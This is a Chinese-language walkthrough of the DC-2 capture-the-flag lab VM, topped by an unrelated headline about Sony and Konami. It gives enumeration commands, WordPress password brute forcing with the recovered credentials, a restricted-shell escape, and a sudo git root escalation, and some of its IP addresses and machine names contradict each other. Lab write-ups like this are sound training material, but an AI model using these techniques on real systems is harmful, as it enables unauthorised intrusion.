傳索尼買下了Konami一個“非常流行的IP”
描述:靶機DC-2共有5個flag,最終需要
環境:Vmware虛擬機器軟體
DC-1靶機IP地址:192.168.1.146
kali的IP地址:192.168.1.148
1.檢視ip
nmap -sP 192.168.1.0/24 檢視ip
nmap -A 192.168.1.146 #這裡我的靶機IP是146
2.瀏覽器訪問http://192.168.220.146,發現無法正常訪問頁面,但在url位址列會有http://dc-2
3.編輯/etc/hosts檔案,新增靶機IP地址及對應域名:192.168.220.146 dc-2
vim /etc/hosts
192.168.1.146 dc-2
4.新增域名解析後,可以正常訪問網頁資訊,並能在Flag頁面找到flag1
提示使用cewl密碼字典生成工具,並且在登入後可以找到下一個flag
5.flag1提示可以登入,但正常訪問網頁無法找到登入頁面,所以使用nikto工具掃描網站結構,找到wp-login.php登入頁面
nikto -h dc-2 -o nikto-dc2.txt
cat dc-2.nikto
6.訪問登入頁面:http://dc-2/wp-login.php
7.使用wpscan工具掃描網站,獲取可以登入網站的使用者名稱,掃描後可以找到三個使用者名稱:admin、tom、jerry
wpscan --url dc-2 -e u
8.將掃描到的三個使用者名稱新增到dc-2users.list
vim dc-2users.list
admin
tom
jerry
9.使用flag1中提示的工具cewl生成密碼字典dc-2.dic
cewl dc-2 -w dc-2.dic
cat dc-2.dic
10.使用wpscan工具爆破可以登入使用者的密碼,可成功爆破tom和jerry使用者,密碼為:
jerry / adipiscing
tom / parturient
wpscan --url dc-2 -U dc-2users.list -P dc-2.dic
11.用ssh對其中一個進行連線,輸入密碼
ssh [email protected] -p 7744
BASH_CMDS[a]=/bin/sh;a #呼叫/bin/sh命令直譯器
export PATH=$PATH:/bin/ #使用bash命令直譯器
export PATH=$PATH:/usr/bin #設定環境變數
找到flag3
切換到Jerry使用者找到flag4
flag4 提示我們可以使用git,我們可以通過git來提權
sudo -l #檢視可以使用root許可權無密碼的命令,有git命令
sudo git -p help #提權
然後彈出一堆東西最後是個冒號,我們在冒號後面輸入
! /bin/bash
然後就到了root使用者再輸入id ,whoami檢視自己的成果!
whoami #檢視當前使用者
passwd root #修改root密碼
123456 #密碼修改為:123456
su root #切換到root使用者
cd /root #進入到root家目錄下
ls #找到final-flag.txt